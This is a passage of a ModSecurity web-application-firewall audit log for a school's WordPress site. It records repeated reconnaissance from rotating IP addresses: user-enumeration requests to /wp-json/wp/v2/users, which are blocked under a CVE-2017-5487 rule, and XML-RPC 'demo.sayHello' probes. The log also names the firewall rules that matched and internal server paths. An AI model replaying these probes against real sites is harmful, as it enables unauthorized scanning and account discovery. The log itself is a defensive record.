[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355222076687 4830 (- - -) Stopwatch2: 1746355222076687 4830; combined=3750, p1=430, p2=3108, p3=29, p4=32, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8e61818-Z-- --718f1e72-A-- [04/May/2025:17:42:00 +0700] aBdEeNsVQyl9V2B8Pt_AQQAAAEw 103.236.140.4 59658 103.236.140.4 8181 --718f1e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --718f1e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --718f1e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355320169491 3190 (- - -) Stopwatch2: 1746355320169491 3190; combined=1293, p1=438, p2=820, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --718f1e72-Z-- --5ffcd544-A-- [04/May/2025:17:42:10 +0700] aBdEgmJEE9ao5dcyYWn3eAAAAI8 103.236.140.4 59662 103.236.140.4 8181 --5ffcd544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5ffcd544-C-- demo.sayHello --5ffcd544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ffcd544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355330685919 5957 (- - -) Stopwatch2: 1746355330685919 5957; combined=4304, p1=568, p2=3509, p3=33, p4=35, p5=95, sr=97, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ffcd544-Z-- --77b8200d-A-- [04/May/2025:17:43:51 +0700] aBdE52JEE9ao5dcyYWn3ewAAAJQ 103.236.140.4 59670 103.236.140.4 8181 --77b8200d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --77b8200d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b8200d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355431773549 3031 (- - -) Stopwatch2: 1746355431773549 3031; combined=1411, p1=447, p2=870, p3=0, p4=0, p5=94, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b8200d-Z-- --e7845247-A-- [04/May/2025:17:44:01 +0700] aBdE8WJEE9ao5dcyYWn3fQAAAJI 103.236.140.4 59674 103.236.140.4 8181 --e7845247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7845247-C-- demo.sayHello --e7845247-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7845247-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355441539806 5231 (- - -) Stopwatch2: 1746355441539806 5231; combined=3923, p1=511, p2=3197, p3=28, p4=32, p5=92, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7845247-Z-- --0eb6603c-A-- [04/May/2025:17:45:54 +0700] aBdFYmJEE9ao5dcyYWn3gwAAAIY 103.236.140.4 59696 103.236.140.4 8181 --0eb6603c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eb6603c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb6603c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355554768179 3349 (- - -) Stopwatch2: 1746355554768179 3349; combined=1435, p1=470, p2=934, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb6603c-Z-- --02f0e70e-A-- [04/May/2025:17:45:59 +0700] aBdFZ_nZiHJYHUAF8QfkNwAAAAk 103.236.140.4 59700 103.236.140.4 8181 --02f0e70e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02f0e70e-C-- demo.sayHello --02f0e70e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02f0e70e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355559575796 5285 (- - -) Stopwatch2: 1746355559575796 5285; combined=3958, p1=533, p2=3211, p3=29, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02f0e70e-Z-- --67bd6919-A-- [04/May/2025:17:47:34 +0700] aBdFxvnZiHJYHUAF8QfkVAAAABg 103.236.140.4 59796 103.236.140.4 8181 --67bd6919-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67bd6919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67bd6919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355654034166 3211 (- - -) Stopwatch2: 1746355654034166 3211; combined=1410, p1=466, p2=911, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67bd6919-Z-- --ab6c9944-A-- [04/May/2025:17:47:40 +0700] aBdFzPnZiHJYHUAF8QfkVwAAAAg 103.236.140.4 59808 103.236.140.4 8181 --ab6c9944-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab6c9944-C-- demo.sayHello --ab6c9944-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6c9944-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355660101970 4907 (- - -) Stopwatch2: 1746355660101970 4907; combined=3841, p1=496, p2=3145, p3=23, p4=24, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6c9944-Z-- --be209033-A-- [04/May/2025:18:08:56 +0700] aBdKyNsVQyl9V2B8Pt_AXQAAAFM 103.236.140.4 59950 103.236.140.4 8181 --be209033-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be209033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be209033-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746356936278253 2997 (- - -) Stopwatch2: 1746356936278253 2997; combined=1335, p1=448, p2=856, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be209033-Z-- --79d8aa03-A-- [04/May/2025:18:09:02 +0700] aBdKztsVQyl9V2B8Pt_AXwAAAEQ 103.236.140.4 59954 103.236.140.4 8181 --79d8aa03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79d8aa03-C-- demo.sayHello --79d8aa03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79d8aa03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746356942627987 6292 (- - -) Stopwatch2: 1746356942627987 6292; combined=4600, p1=604, p2=3758, p3=38, p4=43, p5=94, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79d8aa03-Z-- --0fe9806e-A-- [04/May/2025:18:15:08 +0700] aBdMPNsVQyl9V2B8Pt_AZgAAAEk 103.236.140.4 59986 103.236.140.4 8181 --0fe9806e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fe9806e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe9806e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357308190220 3380 (- - -) Stopwatch2: 1746357308190220 3380; combined=1426, p1=461, p2=934, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe9806e-Z-- --b872395b-A-- [04/May/2025:18:15:14 +0700] aBdMQtsVQyl9V2B8Pt_AaAAAAEw 103.236.140.4 59994 103.236.140.4 8181 --b872395b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b872395b-C-- demo.sayHello --b872395b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b872395b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357314431081 6077 (- - -) Stopwatch2: 1746357314431081 6077; combined=4317, p1=567, p2=3523, p3=30, p4=34, p5=96, sr=77, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b872395b-Z-- --325a1131-A-- [04/May/2025:18:15:53 +0700] aBdMadsVQyl9V2B8Pt_AagAAAE8 103.236.140.4 59998 103.236.140.4 8181 --325a1131-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --325a1131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --325a1131-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357353545502 3224 (- - -) Stopwatch2: 1746357353545502 3224; combined=1327, p1=486, p2=812, p3=0, p4=0, p5=29, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --325a1131-Z-- --405f6436-A-- [04/May/2025:18:15:58 +0700] aBdMbtsVQyl9V2B8Pt_AbAAAAFI 103.236.140.4 60002 103.236.140.4 8181 --405f6436-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --405f6436-C-- demo.sayHello --405f6436-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --405f6436-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357358115497 5354 (- - -) Stopwatch2: 1746357358115497 5354; combined=4046, p1=496, p2=3272, p3=37, p4=34, p5=122, sr=73, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405f6436-Z-- --a3c5e140-A-- [04/May/2025:18:16:35 +0700] aBdMk9sVQyl9V2B8Pt_AbwAAAFQ 103.236.140.4 60008 103.236.140.4 8181 --a3c5e140-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c5e140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c5e140-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357395796050 3523 (- - -) Stopwatch2: 1746357395796050 3523; combined=1542, p1=498, p2=945, p3=0, p4=0, p5=99, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c5e140-Z-- --5be1d858-A-- [04/May/2025:18:16:43 +0700] aBdMm9sVQyl9V2B8Pt_AcQAAAFg 103.236.140.4 60012 103.236.140.4 8181 --5be1d858-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5be1d858-C-- demo.sayHello --5be1d858-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5be1d858-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357403406022 6347 (- - -) Stopwatch2: 1746357403406022 6347; combined=4635, p1=624, p2=3828, p3=33, p4=36, p5=69, sr=79, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5be1d858-Z-- --217e4a61-A-- [04/May/2025:18:16:48 +0700] aBdMoNsVQyl9V2B8Pt_AcwAAAEE 103.236.140.4 60016 103.236.140.4 8181 --217e4a61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --217e4a61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --217e4a61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line 